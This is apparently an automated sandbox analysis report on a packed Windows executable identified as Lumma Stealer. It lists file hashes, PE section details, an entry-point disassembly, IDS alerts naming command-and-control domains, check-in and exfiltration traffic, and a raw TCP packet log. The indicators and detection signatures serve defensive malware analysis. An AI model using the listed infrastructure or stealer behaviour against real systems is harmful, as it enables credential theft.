                                                                                                                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                  Entropy (8bit):7.948115741174554
                                                                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                  File name:tPSrcPbmRe.exe
                                                                                                                                                                                                                                                                  File size:1'866'752 bytes
                                                                                                                                                                                                                                                                  MD5:259cea876b4ff788ed27fab1f9a978ce
                                                                                                                                                                                                                                                                  SHA1:97928786646a7187c2a02c4acb9fb5b863dc1721
                                                                                                                                                                                                                                                                  SHA256:7d6d42d07947b28756c4c28821f090b28d8f5f1262d355cd0a6d8ec02b49e81b
                                                                                                                                                                                                                                                                  SHA512:5c9b2adbae358aed3f6efdfaf1ebc0c5dba3e755ba5d9cc35fb0306079df621a5b168feb945054dfeeb0c898d069d5948a53ea0728996bc7218fb4dacdfc1c2e
                                                                                                                                                                                                                                                                  SSDEEP:24576:RRSCLKmHkCDlblfhSqBmdGiTJhoUfLeYXrYW+3RJ/fnVcgtppWJ0k7FjjcmPmM:RzLz/lxhSRRDoUzu3RJ/PVc4+0k7V31
                                                                                                                                                                                                                                                                  TLSH:6A8533B5ACB56518C16AB4F7BF1763C23F2AD05D0A86C34CAD563B69C737E8256F0801
                                                                                                                                                                                                                                                                  File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g..............................I...........@...........................I...........@.................................T0..h..

                                                                                                                                                                                                                                                                  File Icon

                                                                                                                                                                                                                                                                  Icon Hash:00928e8e8686b000

                                                                                                                                                                                                                                                                  Static PE Info

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Entrypoint:0x89b000
                                                                                                                                                                                                                                                                  Entrypoint Section:.taggant
                                                                                                                                                                                                                                                                  Digitally signed:false
                                                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                  Time Stamp:0x675F3CD1 [Sun Dec 15 20:32:17 2024 UTC]
                                                                                                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                                                                                                  OS Version Major:6
                                                                                                                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                                                                                                                  File Version Major:6
                                                                                                                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                                                                                                                  Subsystem Version Major:6
                                                                                                                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                                                                                                                  Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                                                                                                                                                                                                  Entrypoint Preview

                                                                                                                                                                                                                                                                  Instruction
                                                                                                                                                                                                                                                                  jmp 00007F9C80CBF0DAh
                                                                                                                                                                                                                                                                  cvtps2pd xmm3, qword ptr [eax+eax]
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  jmp 00007F9C80CC10D5h
                                                                                                                                                                                                                                                                  add byte ptr [esi], al
                                                                                                                                                                                                                                                                  or al, byte ptr [eax]
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], dh
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [edi], bl
                                                                                                                                                                                                                                                                  add byte ptr [eax+000000FEh], ah
                                                                                                                                                                                                                                                                  add byte ptr [edx], ah
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [ecx], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], 00000000h
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  adc byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add dword ptr [edx], ecx
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  xor byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add dword ptr [eax+00000000h], eax
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  adc byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  or ecx, dword ptr [edx]
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  inc eax
                                                                                                                                                                                                                                                                  or al, byte ptr [eax]
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], cl
                                                                                                                                                                                                                                                                  add byte ptr [eax], 00000000h
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  adc byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  push es
                                                                                                                                                                                                                                                                  or al, byte ptr [eax]
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], dl
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [ebx], cl
                                                                                                                                                                                                                                                                  or al, byte ptr [eax]
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [ecx], cl
                                                                                                                                                                                                                                                                  add byte ptr [eax], 00000000h
                                                                                                                                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                                                                                                                                  add byte ptr [eax], al

                                                                                                                                                                                                                                                                  Data Directories

                                                                                                                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x530540x68.idata
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x520000x1ac.rsrc
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x531f80x8.idata
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                                  Sections

                                                                                                                                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                  0x10000x510000x248008a65e749c2398ecb94bd7ceeb2dfbbf7False0.9973980629280822data7.985147260170899IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                  .rsrc0x520000x1ac0x20075720b8ea60aa06a31806981b744f74eFalse0.5390625data5.245569576626531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                  .idata 0x530000x10000x20019a29171433eeef17e42fd663f137134False0.14453125data0.9996515881509258IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                  0x540000x2a60000x200b153287ca836110ea7505c2b9d944355unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                  lyuxeqdh0x2fa0000x1a00000x19f8007e71b600c0144517bbc1fe9cfb80fe77False0.9946136290989771data7.9536418626160845IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                  yvyxycgn0x49a0000x10000x400756bcd6b1cfe5556e89b92fcba76924eFalse0.75390625data5.904567489349839IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                  .taggant0x49b0000x30000x22005b5219b58ccef4d756432506062a65c1False0.05755974264705882DOS executable (COM)0.6695504840035633IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                                                                                                                                                  Resources

                                                                                                                                                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                  RT_MANIFEST0x520580x152ASCII text, with CRLF line terminators0.6479289940828402

                                                                                                                                                                                                                                                                  Imports

                                                                                                                                                                                                                                                                  DLLImport
                                                                                                                                                                                                                                                                  kernel32.dlllstrcpy

                                                                                                                                                                                                                                                                  Network Behavior

                                                                                                                                                                                                                                                                  Suricata IDS Alerts

                                                                                                                                                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                  2024-12-23T07:09:17.454637+01002058378ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat)1192.168.2.6508361.1.1.153UDP
                                                                                                                                                                                                                                                                  2024-12-23T07:09:17.648936+01002058364ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat)1192.168.2.6581851.1.1.153UDP
                                                                                                                                                                                                                                                                  2024-12-23T07:09:17.944613+01002058360ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat)1192.168.2.6527981.1.1.153UDP
                                                                                                                                                                                                                                                                  2024-12-23T07:09:18.086991+01002058370ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacebudi .lat)1192.168.2.6631371.1.1.153UDP
                                                                                                                                                                                                                                                                  2024-12-23T07:09:18.228583+01002058362ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (energyaffai .lat)1192.168.2.6591031.1.1.153UDP
                                                                                                                                                                                                                                                                  2024-12-23T07:09:18.373559+01002058354ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat)1192.168.2.6639061.1.1.153UDP
                                                                                                                                                                                                                                                                  2024-12-23T07:09:18.514270+01002058376ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sustainskelet .lat)1192.168.2.6520771.1.1.153UDP
                                                                                                                                                                                                                                                                  2024-12-23T07:09:18.656111+01002058358ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crosshuaht .lat)1192.168.2.6599671.1.1.153UDP
                                                                                                                                                                                                                                                                  2024-12-23T07:09:18.796359+01002058374ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat)1192.168.2.6628271.1.1.153UDP
                                                                                                                                                                                                                                                                  2024-12-23T07:09:20.477893+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64970723.55.153.106443TCP
                                                                                                                                                                                                                                                                  2024-12-23T07:09:21.404431+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.64970723.55.153.106443TCP
                                                                                                                                                                                                                                                                  2024-12-23T07:09:22.985523+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649710104.21.66.86443TCP
                                                                                                                                                                                                                                                                  2024-12-23T07:09:23.739006+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649710104.21.66.86443TCP
                                                                                                                                                                                                                                                                  2024-12-23T07:09:23.739006+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649710104.21.66.86443TCP
                                                                                                                                                                                                                                                                  2024-12-23T07:09:24.985880+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649712104.21.66.86443TCP
                                                                                                                                                                                                                                                                  2024-12-23T07:09:25.764957+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.649712104.21.66.86443TCP
                                                                                                                                                                                                                                                                  2024-12-23T07:09:25.764957+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649712104.21.66.86443TCP
                                                                                                                                                                                                                                                                  2024-12-23T07:09:27.420862+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649718104.21.66.86443TCP
                                                                                                                                                                                                                                                                  2024-12-23T07:09:29.758273+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649724104.21.66.86443TCP
                                                                                                                                                                                                                                                                  2024-12-23T07:09:32.243897+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649730104.21.66.86443TCP
                                                                                                                                                                                                                                                                  2024-12-23T07:09:34.965088+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649740104.21.66.86443TCP
                                                                                                                                                                                                                                                                  2024-12-23T07:09:37.537904+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649747104.21.66.86443TCP
                                                                                                                                                                                                                                                                  2024-12-23T07:09:37.551995+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.649747104.21.66.86443TCP
                                                                                                                                                                                                                                                                  2024-12-23T07:09:41.398205+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649758104.21.66.86443TCP

                                                                                                                                                                                                                                                                  Network Port Distribution

                                                                                                                                                                                                                                                                  TCP Packets

                                                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:19.081947088 CET49707443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:19.081988096 CET4434970723.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:19.082156897 CET49707443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:19.086308956 CET49707443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:19.086321115 CET4434970723.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:20.477725029 CET4434970723.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:20.477893114 CET49707443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:20.547565937 CET49707443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:20.547590971 CET4434970723.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:20.547935963 CET4434970723.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:20.601061106 CET49707443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:20.729974985 CET49707443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:20.771336079 CET4434970723.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:21.404387951 CET4434970723.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:21.404417038 CET4434970723.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:21.404426098 CET4434970723.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:21.404449940 CET4434970723.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:21.404459953 CET49707443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:21.404464960 CET4434970723.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:21.404486895 CET4434970723.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:21.404517889 CET49707443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:21.404633999 CET49707443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:21.580647945 CET4434970723.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:21.580769062 CET4434970723.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:21.580842018 CET49707443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:21.580861092 CET4434970723.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:21.580935001 CET49707443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:21.618742943 CET4434970723.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:21.618793964 CET4434970723.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:21.618829966 CET4434970723.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:21.618908882 CET49707443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:21.618968010 CET49707443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:21.620933056 CET49707443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:21.620946884 CET4434970723.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:21.620958090 CET49707443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:21.620965004 CET4434970723.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:21.768205881 CET49710443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:21.768316984 CET44349710104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:21.768456936 CET49710443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:21.768825054 CET49710443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:21.768855095 CET44349710104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:22.985419035 CET44349710104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:22.985522985 CET49710443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:22.987227917 CET49710443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:22.987241030 CET44349710104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:22.987515926 CET44349710104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:22.988751888 CET49710443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:22.988771915 CET49710443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:22.988854885 CET44349710104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:23.739046097 CET44349710104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:23.739341974 CET44349710104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:23.739428043 CET49710443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:23.739644051 CET49710443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:23.739694118 CET44349710104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:23.739742041 CET49710443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:23.739758968 CET44349710104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:23.769679070 CET49712443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:23.769736052 CET44349712104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:23.769848108 CET49712443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:23.770235062 CET49712443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:23.770247936 CET44349712104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:24.985745907 CET44349712104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:24.985879898 CET49712443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:24.987258911 CET49712443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:24.987266064 CET44349712104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:24.987566948 CET44349712104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:24.988836050 CET49712443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:24.988864899 CET49712443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:24.988917112 CET44349712104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:25.765037060 CET44349712104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:25.765288115 CET44349712104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:25.765336037 CET49712443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:25.765348911 CET44349712104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:25.765480995 CET44349712104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:25.765542984 CET49712443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:25.765549898 CET44349712104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:25.781424999 CET44349712104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:25.781486988 CET49712443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:25.781496048 CET44349712104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:25.789760113 CET44349712104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:25.789794922 CET44349712104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:25.789818048 CET49712443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:25.789828062 CET44349712104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:25.789880037 CET49712443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:25.884452105 CET44349712104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:25.929265976 CET49712443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:25.929285049 CET44349712104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:25.956609011 CET44349712104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:25.956849098 CET49712443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:25.956859112 CET44349712104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:25.960851908 CET44349712104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:25.960916996 CET49712443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:25.961042881 CET49712443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:25.961050987 CET44349712104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:25.961088896 CET49712443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:25.961097002 CET44349712104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:26.198405027 CET49718443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:26.198455095 CET44349718104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:26.198535919 CET49718443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:26.199079037 CET49718443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:26.199095964 CET44349718104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:27.420732021 CET44349718104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:27.420861959 CET49718443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:27.428394079 CET49718443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:27.428401947 CET44349718104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:27.428647995 CET44349718104.21.66.86192.168.2.6
